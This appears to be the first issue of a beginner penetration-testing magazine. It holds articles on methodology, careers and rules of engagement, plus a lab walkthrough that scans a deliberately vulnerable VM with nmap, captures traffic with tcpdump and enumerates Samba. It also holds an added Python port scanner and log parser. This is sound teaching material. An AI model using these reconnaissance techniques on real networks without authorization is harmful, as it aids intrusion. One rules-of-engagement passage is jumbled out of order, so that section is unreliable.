Cyber Security Auditing Software

Improve your Firewall Auditing

As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.

The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture, and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process.

Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve. www.titania.com
With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device-, version- and configuration-specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising on detail.

You can customize the audit policy for your customer's specific requirements (e.g. password policy), audit the device against that policy and then create the report detailing the issues identified. The reports can include device-specific mitigation actions and be customized with your own company's styling. Each report can then be saved in a variety of formats for management of the issues. Why not see for yourself: evaluate for free at titania.com
Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania’s products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems. www.titania.com
CONTENTS

Dear PenTesters!

We are proud to announce a new line of our Magazine – PenTest StarterKit. It's a magazine dedicated especially (but not only) to newbies and pentesting enthusiasts who would like to gain more experience and knowledge. Conducting a penetration test for the first time might be a big concern for some of you who haven't tried it yet. That's why we open this issue with the section 'How To Start', where you will find the article 'Basics of PenTest' by Nishant Raman, who describes how to start a penetration test. Yury Chemerkin, our expert who made one of the covers of PenTest Magazine, in his article gives some tips on how to begin a pentester career. The section closes with Francesco Perna's article 'Professional Penetration Testing: How to Get Started', where he presents security testing methodologies. Next, you will find the article 'Penetration Testing with Nessus' by Dan Robel, in which you will learn what kind of troubles penetration testers have to face nowadays. From the article 'BackTrack for Pentesting?' by Lloyd Wilke, you will get to know that using BackTrack makes it easy for a pentester to get his/her hands on the required tools to do a good job in finding security exploits in systems. In the 'Network Scanning: The Basic Tools' article, Enrique Sanchez explains the basic techniques used under the hood of great scanners such as nmap and so forth. In his day-to-day job, the author is a member of the Accuvant LABS Enterprise Attack and Penetration Testing team. Then you will have a chance to acquire knowledge about Blind Command Line Injection (BCLI) while reading Chris Duffy's article. From 'CSRF Testing and its Protection Using RequestRodeo', contributed by Nitin Goplani, you will learn more about Cross Site Request Forgery (CSRF), which is one of the most common attacks on the Internet nowadays. Hitesh Choudhary, an ethical hacker, in his 'Python for Coders and Pentesters' article demonstrates how to write a web crawler in Python. In the section 'Let's Talk About Security' you will find an article entitled 'Pentesting a Nation – Is Australia Safe From Attack?', where thanks to its author, Colin Renouf, you will have an opportunity to look at some of the wider issues related to penetration testing and security – the "A" (availability) in the CIA security triad. Last but not least is an interview with Rod Soto, the winner of last year's Black Hat hacking competition, a security researcher and a board member of HackMiami. We are sure you will find this interview as educative as it is inspiring. We hope you will enjoy your reading!

Kamil Sobieraj & PenTest Team

HOW TO START

06 Basics of Pentest: A Lesson for Beginners
By Nishant Raman
'How to start a pentest' is a big concern and question in the mind of any beginner who is going to conduct a pentest for the first time. Knowing about the various tools is always an interesting part for any ethical hacker, but to begin any pentesting assignment you should have a sound approach and plan.

10 Pentester Career: How to Begin?
By Yury Chemerkin
You will learn what to take into consideration when assessing your pentest knowledge. Is it a degree, skills, certifications or maybe knowledge of programming languages? Moreover, you will get answers to questions like: what to learn or what to do to become a pentester? How to improve your pentester skills? Finally, you will learn what skills each pentester should possess and how to gain them.

12 Professional Penetration Testing: How to Get Started?
By Francesco Perna
The first approach to penetration testing activities seems like black voodoo art to anyone who has never considered computer security problems. The truth is that in this kind of activity no magic art is involved and no supernatural power is necessary in order to proceed. All you need for successful penetration testing is a fully functional "/dev/brain", very specific technical preparation, strong knowledge of security testing methodologies, a little bit of imagination and a lot of practice.

PENTESTING WITH TOOLS

20 Penetration Testing with Nessus
By Dan Robel
In the last 10 years, cybersecurity has become a household word and, due to the growth of critical infrastructure and an exponential increase in the related threat of cyber-attack, dominates every conversation we have about securing that critical infrastructure. From this article you will learn what troubles penetration testers have to face nowadays.

26 BackTrack for Pentesting?
By Lloyd Wilke
BackTrack makes it easy for a pentester to get his/her hands on the required tools to do a good job in finding security exploits on systems. It also gives the so-called "script kiddies" access to professional tools that are so easy to use that they can exploit systems without understanding what has been achieved.

32 Network Scanning: The Basic Tools
By Enrique Sanchez
This article will try to explain the basic techniques used under the hood of great scanners such as nmap and so forth. This will allow the reader not only to better understand how network scanners work in the discovery phase, but also to implement their own scanners, or use other programs to gather this information, in case nmap or other tools would trigger IDS signatures and the engagement requires not being caught (Red Team).

POTENTIAL ATTACKS & DEFENSE METHODS

46 Blind Command Line Injection
By Chris Duffy
Blind Command Line Injection (BCLI) occurs when a web application allows operating system commands to be executed through it with no confirmation of execution. BCLI is typically found in poorly coded applications that allow access to files or data through a web interface. Read this article to get more information about BCLI.

50 CSRF Testing and its Protection Using RequestRodeo
By Nitin Goplani
Cross Site Request Forgery (CSRF) is one of the most common attacks on the Internet today. Attackers find it easy to exploit because they need no authentication information or session cookies of their own, only a victim who is currently authenticated to the application. Furthermore, it is possible on every platform and it does not matter which authentication type the application uses.

56 Python for Coders and Pentesters
By Hitesh Choudhary
The Python programming language was Guido van Rossum's gift to the web world. Most of the time InfoSec practitioners need to write a Proof of Concept (PoC), automate their attacks or customize some of their tools, and these tasks can create a lot of headaches.

LET'S TALK ABOUT SECURITY

58 Pentesting a Nation – Is Australia Safe From Attack?
By Colin Renouf
This article looks at some of the wider issues related to penetration testing and security – the "A" (availability) in the CIA security triad – and how an attack on inadequate national infrastructure could impact a global system.

INTERVIEW

62 Interview with Rod Soto
By PenTest Team
Rod Soto is a security researcher and board member of HackMiami. He is a regular speaker at hacking conferences all over the country on the topics of penetration testing tools and methods, as well as the topic of digital civil liberties. He will tell us about his experience in the pentest field.

TEAM
Editor in Chief: Ewa Dudzic
Managing Editor: Kamil Sobieraj
Associate Editors: Patrycja Przybyłowicz, Ewa Duranc, Zbigniew Fiołna
Editorial Advisory Board: Jeff Weaver, Rebecca Wynn
Betatesters & Proofreaders: Vaman Amarjeet, Gregory Chrysanthou Balogun, Ayo TayoBalogun, Jeff Weaver, Amit Chugh, Pinto Elia, Ewa Duranc, Jeff Smith, Julian Estevez, Rod MacPherson, Scott Christie
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic
Art Director: Ireneusz Pogroszewski
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca
Publisher: Hakin9 Media, 02-682 Warszawa, ul. Bokserska 1, Phone: 1 917 338 3631
www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER! The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

StartKit 01/2013(01) Page 4 http://pentestmag.com
HOW TO START

Basics of Pentest: A Lesson for Beginners

This article is written for beginners who have just started their career in the security domain as pentesters and are planning to become successful ones. 'How to start a pentest' is a big concern and question in the mind of any beginner who is going to conduct a pentest for the first time.

Knowing about the various tools is always an interesting part for any ethical hacker, but to begin any pentesting assignment you should have a sound approach and plan. This article will focus in depth on what approach should be taken to start a pentest.

Scenario
Very often, at the beginning of a pentest, you will face one of two situations:

• The organization that wants the pentest conducted on their network provides you with just a list of IP addresses, OR
• The organization provides you with an email address or domain name only.

Considering both scenarios, you will have a bunch of queries in your mind: how to start, what to do, what would be the first step, etc. So, without testing your zeal, let's see 'How to Start a Pentest'.

Approach
Whichever scenario you are in, the very first step is to go through the methodology in order to set up the positive flow of your pentest activity. Let's have a closer look at the methodology of a pentest (see Figure 1).

Figure 1. Methodology of a pentest

Step 1: IPs
If you are in scenario II, you have only an email ID or domain name. From here, the very first thing you need to find out is the IP address space registered to the organization for which you are conducting the pentest activity. To get the IP address details you can use various tools and websites, such as www.whois.net, www.yougetsignal.com, www.whois.sc, www.dnsstuff.com, etc. Before scanning any address found this way, confirm it against the customer's written authorization: a whois lookup can return ranges shared with a hosting provider or other tenants that are not yours to test. After getting the IP address details you will have another question in your mind: should I do the pentest on all the registered IPs? The answer is 'NO'. You cannot decide that at this moment. You will have to find all the active or usable IPs first. Remember that most organizations keep some of their IPs as spares, so there is a very big possibility that you will find fewer active IPs than registered IPs. To find all the active IPs you can use various IP scanner tools, such as Angry IP (see Figure 2), SuperScan, hping, etc. Note that to get the exact number of active IPs you need to perform multiple scans, because during any single scan some of the devices can be down or inactive. This should allow you to gather information about all the active IPs. To get further information about the organization's network infrastructure you can also visit job websites and analyze the requirements listed in the organization's postings.

Example
If the organization has posted requirements on a job website for an Oracle DBA and a Fortigate firewall specialist, this means that they use Oracle databases and Fortigate firewalls, so you can prepare your test plan accordingly and try to get more information about this in the next steps of the pentest.

Step 2: Port Scanning
This step is very important during the pentest activity. The previous one let you find the active IPs; now it is time to perform port scanning on those IPs. During port scanning you will not only gather information about ports, but most probably you will also get some details about services, the operating system, and the versions of the OS and services. For this purpose you can use tools like Zenmap (see Figure 3), Nmap (see Figure 4), SuperScan, etc. When you have gathered the information about open ports and the versions of services and operating systems, you need to do some exercise and R&D to collect, using your skills, other details about the operating system and services.

Step 3: Vulnerability Scan
Now you have to do vulnerability scanning of each IP address. This will allow you to get information about the vulnerabilities pertaining to the operating system, services, and applications running on the devices or servers associated with the active IPs. For this purpose you can use network and application vulnerability scanner tools like Nessus, Retina, AppScan, Acunetix, etc. Once the scanner has generated a report you need to analyze it deeply and understand the weaknesses or loopholes found in the report.

Step 4: Research and Exploitation
This step is a bit difficult. You need to perform exploitation of the loopholes which you have found during steps 2 & 3. The process of exploitation will let you compromise the server or device and gain access to it. To get this accomplished, you need to have deep hands-on experience with the Metasploit Framework and BackTrack.
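The discovery and port-scanning steps above, worked through in code as an added example (not part of the original article, and not the code of Nmap, Angry IP or any tool it names): a Python TCP connect scan that refuses any target outside a written scope, repeats the sweep and merges the rounds as Step 1 advises, and grabs a service banner as the first input to the version work of Step 2. The authorized scope (127.0.0.0/8), the stand-in "SSH" listener and its greeting are constructed for the demo so it runs offline; on a real engagement the same scope check belongs in front of whatever you feed to Nmap and Nessus.

```python
import ipaddress
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Constructed for this example: the ranges the customer authorized in writing.
# Loopback only, so the demo never touches a real network.
AUTHORIZED_SCOPE = ["127.0.0.0/8"]


def in_scope(ip, scope=AUTHORIZED_SCOPE):
    """True only if ip falls inside one of the authorized networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(net) for net in scope)


def tcp_probe(ip, port, timeout=0.5):
    """Full TCP connect probe: True if something accepts the connection.
    A connect scan needs no privileges, unlike SYN or ICMP probes."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((ip, port)) == 0


def scan_host(ip, ports, workers=32):
    """Probe every port in `ports` on one host; refuse out-of-scope targets."""
    if not in_scope(ip):
        raise ValueError(f"{ip} is outside the authorized scope, not scanning")
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, tcp_probe(ip, p)), ports))
    return sorted(p for p, is_open in results if is_open)


def sweep(ip, ports, rounds=3):
    """Scan more than once and merge: a port that answered in any round is
    reported, so a host or service that was briefly down is not missed."""
    seen = set()
    for _ in range(rounds):
        seen.update(scan_host(ip, ports))
    return sorted(seen)


def grab_banner(ip, port, timeout=1.0):
    """Read the service's first bytes; version detection starts from this."""
    with socket.create_connection((ip, port), timeout=timeout) as s:
        try:
            return s.recv(256).decode("latin-1", "replace").strip()
        except socket.timeout:
            return ""


def start_demo_service(greeting=b"SSH-2.0-demo_1.0\r\n"):
    """Constructed stand-in target on an ephemeral loopback port, so the
    example runs offline. Returns the listening socket; close() stops it."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:      # listener closed
                return
            with conn:
                try:
                    conn.sendall(greeting)
                except OSError:  # scanner hung up before reading
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv


if __name__ == "__main__":
    svc = start_demo_service()
    target, port = svc.getsockname()
    window = range(max(1, port - 20), min(65535, port + 20))
    print("open ports:", sweep(target, window))
    print("banner on %d: %r" % (port, grab_banner(target, port)))
    svc.close()
```

The scope check is deliberately the first thing `scan_host` does, so a typo in a target list fails loudly instead of probing someone else's address space; the merged multi-round sweep is what makes the "scan more than once" advice mechanical rather than a reminder.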
Suggestions
To be a good pentester you should have deep theoretical as well as practical knowledge. You need to get as much experience as possible with some of the tools mentioned (Nmap, Metasploit, BackTrack, vulnerability scanner tools, etc.). You should be active on information security related blogs and spend a good amount of time on R&D and vulnerability research. You need to keep yourself up to date regarding zero-day vulnerabilities and exploits. And never forget that it is your zeal for learning that will play the key role in your success.

Figure 2. Angry IP Scanner
Figure 3. Zenmap Port Scanner
Figure 4. Nmap Port Scanner

NISHANT RAMAN
Nishant Raman is the Founder and Chairman of CydCon IT Solutions Pvt. Ltd., New Delhi, India. He has experience in ethical hacking and web application pentesting. Having been a security consultant for the last seven years, he continuously helps IT, banking and non-IT organizations improve their application and network security. He works not only for domestic clients but provides his consultancy all over the world.
Quantum Leap
Pescara: Via Colle Scorrano, 5, 65100 Pescara, F. +39 0857992241
Roma: Piazza G. Marconi, 15, 00144 Roma, T. +39 0632803612, F. +39 0632803283
www.quantumleap.it
Pentester Career: How to Begin?

Some people start by talking about a degree; others say that nothing except fundamentals matters. You can acquire a significant part of the whole body of knowledge even before college, or do nothing useful even after the degree.

This is not a discussion of how your degree affects your skills; it does not, because practical skills have something in common with the 'fundamentals' only if the two are on the same path and lead you to the same goal. Not every country has such educational institutes (maybe Germany has). You are free to argue against both sides, or to choose your own path, where there is room to solve different problems instead of misplacing them. This debate is often extended to certifications; they matter, no doubt, especially when you know that whoever hires you looks for them. However, you may find another way to show them that you can manage such projects, which depends on additional skills such as programming. I mean that you can develop your own tools and exploits, participate in open-source groups that aim at the same thing, improve some tool or exploitation mechanism or automate it, mix several tools, or even redevelop them. This helps you understand how OS components link and work together, as well as how to break into a system. In the debate over which languages must be learned, there are two sets that depend on the OS (under Windows – C/C++ and Assembler; under Linux/RedHat/CentOS – Python and Ruby). However, that does not mean you should limit yourself to these languages: software is developed in many other languages, and a program may have popular add-ons written by someone who prefers .NET or has to use it.

Besides, do not forget that you should not only develop something but pentest too. That does not mean you should stop improving your skills; there are many out-of-the-box tools and solutions you have to learn and use, like BackTrack. There will be a need to improve or customize them to fit the network, system or other specifications. Being part of a team like Hackers for Charity (http://www.hackersforcharity.org/) helps you collect all the skills across system security, network security, application security, etc. On the other hand, getting forensics skills may help too. Therefore, learning and practicing with home networks and corporate sandboxes, bypassing NAC and VLANs, and finding loopholes in isolated segments helps in understanding stacks, buffers and memory and their vulnerabilities. In addition, you can learn a specific technology such as AVR: this kind of programming involves C/C++ knowledge as well.

Anyway, first steps in this field might involve reading books, but almost all books (except those from the Syngress publishing house) are rewritten and redesigned from each other, which brings old techniques and old tools. So it is better to find books such as the shellcoder's and gray hat books, pentest guidelines (e.g. http://www.pentest-standard.org, http://www.vulnapps.com/) and standards (NIST SP 800-42). As said earlier, you cannot focus on a certain language, software or technology without ending up with purely theoretical knowledge. No one loves Delphi, but enough tools used to research applications implement Delphi libraries (or are written in Delphi). You should collect information about every technology, system and piece of software from any possible source:

• Infosecurity blogs and news (like http://www.vulnapps.com/ or http://exploit-exercises.com/)
• Books and ebooks (like The Art of Software Security Assessment, or The Art of Exploitation)
• Vulnerability databases (like http://www.exploitdb.com/)
• Security conferences and events (every possible one, not only the top-known such as DefCon)
• Templates and cheat sheets (http://pentestmonkey.net/category/cheat-sheet)
• Special guidelines and frameworks (like the OffSec guidelines)

It is quite important to have all of these skills (and not only them), because the key difference between such a tester and someone else is the ability to answer and explain attack vectors and potential ways to attack, and to give discreet, tailored information to each person you interact with. It means: don't overload the CEO with full-detail technical reports generated by Nessus or another tool.

As final thoughts, you should have broad skills in:

• Network solutions (software, protocols and hardware);
• Techniques for attacking and defending IDS, firewalls, AV, embedded and third-party security software;
• Top-known tools and software for gathering data;
• Forensics and intelligence techniques to get evidence;
• Human security techniques (social engineering and physical security);
• Participating in CTFs and conferences;
• Simply being involved, to gain and share knowledge with smart people.

Good luck,

YURY CHEMERKIN
Currently in the postgraduate program at RSUH, working on a Cloud Security thesis. Experience in reverse engineering, software programming, cyber and mobile security research, documentation, and as a contributing security writer.
Professional Penetration Testing: How to Get Started

The first approach to penetration testing activities seems like black voodoo art to anyone who has never considered computer security problems. The truth is that in this kind of activity no magic art is involved and no supernatural power is necessary in order to proceed.

All you need for successful penetration testing is a fully functional /dev/brain, very specific technical preparation, strong knowledge of security testing methodologies, a little bit of imagination and a lot of practice.

Many think that penetration testing is an activity reserved only for hackers. This is partially true: a good hacker could be a penetration tester, but penetration testing activities are a completely different story from hacking. When talking about hacking, there's no applicable rule; the limit to the "activity" resides only in the hacker's imagination. A hacker doesn't follow any publicly available methodology, doesn't need to be clear in explaining a vulnerability, and doesn't have to write reports! Hackers just hack to reach their own objectives in the way they prefer. Contrary to hacking, done for fun, for research or in any of its forms, penetration tests are meant for companies and organizations that need either to verify whether their security level meets certain requirements (state regulations, company policy, international standards and so on) or to evaluate the risks related to the findings. That's why, in order to be effective, a penetration test must be executed with formalisms understood by the Customer, both in the test execution and in the way the identified vulnerabilities are reported.

In this article you will learn some of the basics of penetration testing. First of all, a little bit of penetration test theory will be discussed, then some basic techniques used during a penetration test will be shown through a practical approach applied to a system that is vulnerable by design. I have assumed that the reader is familiar at least with the basic concepts of security and TCP/IP. The practical examples are made using the commonly available security tools shipped with the Linux distro BackTrack 5 R3 [1] against the Kioptrix VM (level 1) [2]. Although BackTrack isn't a new trend among penetration testing distros, we decided to use it due to the large number of tutorials that a beginner can find on the Internet. Obviously, you don't have to use it. If you feel more comfortable using Kali, BackBox, Debian, Slackware, Ubuntu, any of a hundred Linux distributions, OS X or Windows, then use it.

What is a Penetration Test and what is it for
A penetration test could be defined as a method used to evaluate the security level of a set of assets. The goal of a penetration test, despite the name, is no longer to break or penetrate into a system. Instead, it is to identify, through a scientific methodology, the security level of the evaluated assets. I'm talking about assets instead of computers, networks and systems because, in a 'holistic' perspective, a penetration test isn't necessarily intended for technological stuff. Below are listed the main advantages of following a scientific methodology:

• penetration tests are conducted thoroughly and the results are consistent: if anyone repeats the penetration test using the same methodology on the same asset, he or she should (net of errors) obtain the same results;
• results leave no room for interpretation, and what is asserted can be demonstrated through the evidence collected during the analysis. Furthermore, penetration test results are measurable in a quantitative way that depends on the adopted methodology;
• the posture towards the penetration test complies with the law. This is really important, especially if something goes wrong. It's crucial that at least the following legal aspects are met:
  • a penetration test may only occur after a clear analysis of the regional laws, both for the security professional and for the Company or Organization being tested;
  • a penetration test may only occur after the signature of a written permission by the Customer. I used the term 'written permission' because a permission sent by e-mail, and, in some countries, even by fax, isn't enough to protect you and your Company from lawsuits. Consider consulting a lawyer to define the terms of the written permission.

There are several kinds of penetration tests, and each one's methodology is different from the others. The common denominator between these different methodologies is the information provided to the security professional and to the customer's employees: the less information is shared, the more reliable the test will be in simulating a real threat.

Penetration Test Methodologies
There are several methodologies to conduct a successful penetration test. Depending on the methodology, the different steps of the penetration test, such as posture review, reporting of the findings or risk evaluation, may vary. To my knowledge, the most widely used methodologies are the following ones:

OSSTMM [3]
The Open Source Security Testing Methodology Manual (OSSTMM) is a peer-reviewed manual of security testing and analysis released by ISECOM (the Institute for Security and Open Methodologies). The OSSTMM concerns operational security and proposes a scientific method to measure how well security works. Besides technical aspects, OSSTMM takes into serious consideration the legal and ethical aspects related to security tests. ISECOM also provides a set of professional certifications related to the methodology;

ISSAF [4]
The Information Systems Security Assessment Framework (ISSAF), released by OISSG (Open Information Systems Security Group), provides validation for bottom-up security strategies, such as penetration testing, as well as top-down approaches, such as the standardization of an audit checklist for information policies;

OWASP [5]
The Open Web Application Security Project (OWASP) testing guide, released by the OWASP Project, is a methodology focused on web application penetration testing. The OWASP methodology also proposes its own risk analysis strategy.

The choice of methodology is really important as it deeply affects the way you work: it is really important to deeply understand a chosen methodology before applying it. Each methodology requires a different way of proceeding, collecting information, reporting the findings and evaluating the related risks. Remember that during a penetration test the security professional is legally responsible for his actions, so, quoting a friend of mine, 'Cover your ass!'.

To clarify, the previously listed methodologies are only examples and I don't want to imply that they are better than other existing methodologies: every methodology has its own strengths and weaknesses and it is your responsibility to understand whether it fits your needs.

Rules of Engagement
Methodologies define a way to approach a penetration test safely and professionally. Depending on the adopted methodology, the way to approach the penetration test may be slightly different. Regardless of the adopted methodology, please be sure to comply at least with the following rules of engagement:

• Penetration test scope definition: you need to verify with the Customer the scope of the penetration test in terms of number of targets, acceptable practices, involved parties and time window. During the scope definition you should be able to identify any obviously insecure or unstable system and should avoid testing it. It is crucial to have this information to define the necessary effort and the involved perimeter;
• Contract terms definition: the contract should also include a line of communication and emergency contacts. One of the most important aspects in professional penetration testing is confidentiality. Regardless of the existence of a non-disclosure agreement, you must not reveal any information acquired from the customer, nor the results of the testing, to third parties not identified by the customer as referents for the penetration test. Although a penetration test conducted professionally should not be destructive, you need to clearly state in the contract the dangers, risks and limitations related to the penetration test activities. The contract must include the written authorization to proceed with the security tests. Be sure to include inside the written authorization signed by the Customer at least the information related to the perimeter, the acceptable practices, the time window and the source of the analysis (like the originating IP address for the attack simulations, telephone num-

should contain all the issues discovered during the penetration test along with the evidence and the necessary steps to reproduce these issues. The report should also contain a practical solution to the reported issues. The report must be transmitted maintaining its confidentiality end-to-end, and the customer must know the implications of uncontrolled diffusion of the information inside it.

Pentest Simulation Scenario
Let's start with a simulation of a penetration test. I am assuming at this point that all the legal and non technical aspect are sorted out (such as the Customer having signed the contract and written authorizations). The scope of this simulated penetration test is a single system connected to the
bers used during war dialing, etc.); • Technical activities: rst of all, and this is a golden and inviolable rule, you must operate respecting the law. Remember that you're the only responsible of that. Trace all your activities, both on your system and on the Customer's ones, in order to protect yourself in case of troubles. Keep every information acquired during the test safe and secure in order to guar-
Customer's network and your task is to start with an analysis of the system. In my simulation the target
(that is the kioptrix) has IP address 192.168.1.105 and my system (that is BackTrack) has IP address 192.168.1.107.
Penetration Test Simulation: Setup the Logging The first activity in a test is to setup the logging
environment for both the shell and network traffic. In my setup I connect through SSH to my BackTrack and I directly log all the commands sent to the shell. On a Windows system you can use PuT-
TY [6], or something equivalent, to log the whole session. Figure 1 shows how to configure PuTTY to enable session logging.
antee condentiality. Don't be destructive and don't carry out any intentional denial of ser-
vice attack against the target. Never use tools that you don't know properly: you can cause potential damages and this is unacceptable. If in doubt about the eventuality of causing dam-
age with a test, inform the Customer rst and obtain the authorization, preferably in written form, to carry out the specic test. If you dis cover a breach during your activities, suspend immediately the penetration test and inform the Customer. Last but not least, at the end of a penetration test, clean the targets from anything that you may have installed during the analysis; • Reporting: the report is what, eventually, summarizes the outcome of a penetration test. It
StartKit 01/2013(01)
Figure 1. PuTTY session logging
Page 14
http://pentestmag.com
Under Linux and Unix-like systems it is possible to log the session using the OpenSSH [7] client and the tee command, as I show in Listing 1. Once logged into the BackTrack host, I suggest that you customize your shell prompt to include information such as the day and time. This is a useful trick to piece together the time-line of the simulated attack. Listing 2 shows how to set up this customized prompt using the bash [8] shell. The next step is to set up the logging of network traffic; for this task I use the tcpdump utility. Usually I log the traffic of the whole target subnet in order to identify any spurious or unexpected response. In this specific case, because the systems are directly connected, I only log the network traffic involving the kioptrix system. Listing 3 shows how to use tcpdump to log the network traffic.
After these preliminary steps, it is time to proceed with the analysis.
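The payoff of the logging set-up is that the session log can be turned back into a time-line of what was run and when. The following Python example is added here and is not code from the article; it assumes a log produced as in Listing 1 and the exact prompt of Listing 2 (bash's \d prints no year, so the caller supplies it), and the sample log lines it parses are constructed:

```python
"""Rebuild a command time-line from an SSH session log captured with tee.

Added example, not code from the article. It assumes the prompt of Listing 2,
PS1="[\\d \\t \\u@\\h:\\w]$ ", so each command line in the log starts with
"[Wed Apr 24 01:58:02 pentest@bt:~]$ ". Bash's \\d prints no year, so the
caller supplies it.
"""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List

# One prompt as printed by PS1="[\d \t \u@\h:\w]$ ", followed by the typed command.
PROMPT_RE = re.compile(
    r"^\[(?P<dow>[A-Za-z]{3}) (?P<mon>[A-Za-z]{3}) (?P<day>\d{1,2}) "
    r"(?P<time>\d{2}:\d{2}:\d{2}) (?P<user>[^@\s]+)@(?P<host>[^:\s]+):(?P<cwd>\S+)\]\$ ?(?P<cmd>.*)$"
)


@dataclass
class Entry:
    when: datetime
    who: str   # user@host, so logs from several hosts can be merged later
    cwd: str
    cmd: str


def parse_timeline(log_text: str, year: int) -> List[Entry]:
    """Return one Entry per command typed at the prompt, in log order.

    Command output (lines not starting with the prompt) and empty prompts
    (Enter pressed with no command) are skipped.
    """
    entries: List[Entry] = []
    for raw in log_text.splitlines():
        m = PROMPT_RE.match(raw.rstrip())
        if not m or not m.group("cmd").strip():
            continue
        when = datetime.strptime(
            f"{year} {m.group('mon')} {m.group('day')} {m.group('time')}",
            "%Y %b %d %H:%M:%S",
        )
        who = f"{m.group('user')}@{m.group('host')}"
        entries.append(Entry(when, who, m.group("cwd"), m.group("cmd").strip()))
    return entries


def render(entries: List[Entry]) -> str:
    """One line per command with the seconds elapsed since the previous one."""
    lines, prev = [], None
    for e in entries:
        gap = "" if prev is None else f"+{int((e.when - prev).total_seconds())}s"
        lines.append(f"{e.when:%Y-%m-%d %H:%M:%S} {gap:>7} {e.who} {e.cwd}  {e.cmd}")
        prev = e.when
    return "\n".join(lines)


# Constructed sample log (not a real capture): prompts, commands and some output.
SAMPLE_LOG = """\
[Wed Apr 24 01:57:40 pentest@bt:~]$ tcpdump -i eth0 -n -s0 -w PT-LOG.pcap host 192.168.1.105 &
[1] 2304
[Wed Apr 24 01:58:02 pentest@bt:~]$ nmap -sS -sV -P0 -O -n -p 1-65535 192.168.1.105
Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-24 01:58 CEST
Nmap done: 1 IP address (1 host up) scanned in 22.02 seconds
[Wed Apr 24 02:00:15 pentest@bt:~]$
[Wed Apr 24 02:00:31 pentest@bt:~]$ rpcclient -I 192.168.1.105 -w MYGROUP -U "%"
"""

if __name__ == "__main__":
    print(render(parse_timeline(SAMPLE_LOG, year=2013)))
```

The elapsed-time column is what makes the log useful as evidence: it lines up each command with the packets in the tcpdump capture, and the user@host field lets logs from more than one testing machine be merged by time.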
Listing 1. SSH session logging
$ ssh pentest@192.168.1.107 | tee ~/ssh-output.log

Listing 2. Custom prompt
$ export PS1="[\d \t \u@\h:\w]$ "

Listing 3. Network traffic logging
$ tcpdump -i eth0 -n -s0 -w PT-LOG.pcap host 192.168.1.105

Penetration Test Simulation: Services Enumeration
I am assuming here that you are familiar with the TCP/IP protocol suite. The first step in analyzing the security of the target is to identify the services that it exposes. To identify these services I use the nmap [9] port scanner. Specifically, I perform a full port scan using the SYN scan technique, in order to also identify services listening on non-standard ports. Listing 4 shows how to use nmap to perform this task.
A brief analysis of the port scan results shows that the target has at least one outdated service, for example the Apache daemon listening on ports 80 and 443, and at least one security misconfiguration, since the ssh daemon listening on port 22 is configured to support version 1 of the protocol.
After identifying the TCP services exposed by the target, it is time to discover whether it exposes any UDP service. Differently from the TCP case, to identify whether or not a UDP port is open, nmap has to send active solicitations using commands pertinent to the specific service supposed to be resident on a certain port. This means that if a service is exposed on a non-standard port, or if the service does not recognize the requests made by the port scanner, nmap will report the port as closed|filtered. This also means that it makes no sense to scan the whole UDP port range. The way I perform the UDP scan is shown in Listing 5.
It is furthermore possible to see in the results that the target exposes the NetBIOS protocol using the Samba daemon. Depending on the methodology, the port scan results are also useful for the risk evaluation. These results are the starting point for further analysis aimed at identifying vulnerabilities of the target.

Listing 4. TCP ports/services enumeration
$ nmap -sS -sV -P0 -O -n -p 1-65535 192.168.1.105
Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-24 01:58 CEST
Nmap scan report for 192.168.1.105
Host is up (0.00030s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:A9:9E:29 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
